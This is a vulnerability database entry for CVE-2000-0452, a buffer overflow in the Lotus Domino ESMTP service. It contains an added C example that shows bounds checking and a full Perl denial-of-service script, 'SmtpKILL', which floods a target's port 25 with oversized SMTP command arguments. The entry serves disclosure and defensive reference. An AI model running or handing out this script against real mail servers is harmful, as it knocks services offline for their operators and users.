Lotus Domino Server ESMTP Remote Buffer Overflow Vulnerability

Vulnerability ID: 1105843 Vulnerability type: Boundary condition error
Published: 2000-05-18 Updated: 2005-05-02
CVE ID: CVE-2000-0452
CNNVD-ID: CNNVD-200005-075
Platform: Multiple CVSS score: 5.0
|Source
https://www.exploit-db.com/exploits/19944
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-075
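|Vulnerability details
Lotus Domino Server is a web-based collaborative application platform that runs on Linux/Unix and Microsoft Windows. Its ESMTP service contains a buffer overflow vulnerability that a remote attacker may be able to exploit to cause a denial of service. The ESMTP service performs no buffer bounds checking when handling the 'rcpt to', 'saml from' and 'soml from' commands. If the server receives any of these three commands with an argument longer than 4 KB, the system crashes and service resumes only after a reboot.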
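The missing check described above, shown as a bounded handler. This is an added example, not Domino's code or anything from the original advisory; the function names are hypothetical, and the limits are the command-line and path sizes from RFC 5321 section 4.5.3.1.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define SMTP_LINE_MAX 512 /* RFC 5321 4.5.3.1.4: command line, CRLF included */
#define SMTP_PATH_MAX 256 /* RFC 5321 4.5.3.1.3: forward or reverse path */

/* Verbs named in the advisory, plus MAIL FROM, which takes the same argument. */
static const char *const PATH_VERBS[] = {"RCPT TO:", "SAML FROM:", "SOML FROM:", "MAIL FROM:"};

/* Hypothetical helper: SMTP reply code for one received line. 250 = path copied
 * to out, 500 = line too long, 501 = bad or oversized path, 502 = other verb. */
int smtp_check_line(const char *line, size_t len, char *out, size_t outsz)
{
    if (len > SMTP_LINE_MAX) return 500; /* checked before any byte is copied */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n')) len--;
    for (size_t i = 0; i < sizeof PATH_VERBS / sizeof PATH_VERBS[0]; i++) {
        size_t vlen = strlen(PATH_VERBS[i]);
        if (len < vlen || strncasecmp(line, PATH_VERBS[i], vlen) != 0) continue;
        const char *arg = line + vlen;
        size_t alen = len - vlen;
        while (alen > 0 && *arg == ' ') { arg++; alen--; }
        if (alen == 0 || alen > SMTP_PATH_MAX || alen >= outsz)
            return 501; /* the bound the vulnerable handler lacked */
        memcpy(out, arg, alen);
        out[alen] = '\0';
        return 250;
    }
    return 502;
}

/* Constructed sample input: verb + " <a@" + pad filler bytes + ">" CRLF. */
int reply_for_padded(const char *verb, size_t pad)
{
    static char line[8192];
    char out[SMTP_PATH_MAX + 1];
    size_t n = (size_t)snprintf(line, sizeof line, "%s <a@", verb);
    if (pad > sizeof line - n - 3) pad = sizeof line - n - 3;
    memset(line + n, 'x', pad);
    memcpy(line + n + pad, ">\r\n", 3);
    return smtp_check_line(line, n + pad + 3, out, sizeof out);
}

int main(void)
{
    printf("short: %d, 300-byte path: %d, 4 KB argument: %d\n", reply_for_padded("RCPT TO:", 10),
           reply_for_padded("saml from:", 300), reply_for_padded("rcpt to:", 4096));
    return 0;
}
```

An oversized line is answered with 500 or 501 and the session continues; nothing from the argument reaches the fixed-size buffer unless it fits.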
|Exploit
Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3,Mail Server 5.0.1/5.0.2/5.0.3 Buffer Overflow

source: http://www.securityfocus.com/bid/1229/info

The code that handles the 'rcpt to', 'saml from' and 'soml from' commands in the ESMTP service of Lotus Domino Server has an unchecked buffer. If Lotus Domino Server receives an argument of more than 4 KB to any of the listed commands, the system will crash and will require a reboot in order to regain normal functionality.

#!/usr/bin/perl
# Need Net::Telnet to run
# Expl0it By [email protected]
# Tested with success against Lotus Notes 5.0.1, 5.0.2b, 5.0.3
# CMail Server version 2.4.6, Argosoft Mail Server version 1.2.1.0
# and probably many others that I hadn't chance to explore.
# I wrote this after Michal Zalewski brought this issue in BugTraq.
# Cheers 351 and FractalG :)

use Net::Telnet;   


print "SmtpKILL By [email protected]";

if (not $ARGV[1]) {
print qq~
Usage : smtpkill.pl  <type> <host>
	<type> Type of attack :
		type 1 = long mail from: someone@4k_of_junk
		type 2 = long rcpt to: someone@4k_of_junk
		type 3 = long helo longdomain_with_4k_of_junk
		type 4 = long undefined command (4k_of_junk)
		type 5 = long help 4k_of_junk
		type 6 = long mail from: and mail to:

	<host> Host that you want to DOS, Ip or Domain will be ok.
Example Usage : smtpkill.pl 5 127.0.0.1
~; exit;}      

$type=$ARGV[0];
$target=$ARGV[1];

print "TYPE ATTACK: $type\n";
print "TARGET : $target\n";



for ($i=4096;$i<5096;$i++)
 {
        $obj=Net::Telnet->new( Host => "$target",Port => 25);    

	if ($type=~ "1") { 
	$helo="helo ptrulez";
	$from="mail from: v0v0@". 'ptrulez' x $i;
	$rcpt="rcpt to: [email protected]";
	}

	if ($type=~ "2") { 
	$helo="helo ptrulez";
	$from="mail from: [email protected]";
	$rcpt="rcpt to: v0v0@". 'ptrulez' x $i;
	}

	if ($type=~ "3") {
	$helo="helo ". 'ptrulez' x $i;
	$from="mail from: [email protected]";
	$rcpt="rcpt to: [email protected]";
	}

	if ($type=~ "4") {
	$helo="havesomefun". 'ptrulez' x $i;
	}

	if ($type=~ "5") {
	$helo="help ". 'ptrulez' x $i;
	}

	if ($type=~ "6") {
	$helo="helo ptrulez";
	$from="mail from: ". 'ptrulez' x $i;
	$rcpt="rcpt to: ". 'ptrulez' x $i;
	}

        print "$helo\n";$obj->print("$helo");
        print "$from\n";$obj->print("$from");
        print "$rcpt\n";$obj->print("$rcpt");
        $obj->close;
 }
|References

Source: BID
Name: 1229
Link: http://www.securityfocus.com/bid/1229
Source: OSVDB
Name: 321
Link: http://www.osvdb.org/321
Source: BUGTRAQ
Name: 20000518 Lotus ESMTP Service (Lotus Domino Release 5.0.1 (Intl))
Link: http://archives.neohapsis.com/archives/bugtraq/2000-05/0219.html
Source: NSFOCUS
Name: 531
Link: http://www.nsfocus.net/vulndb/531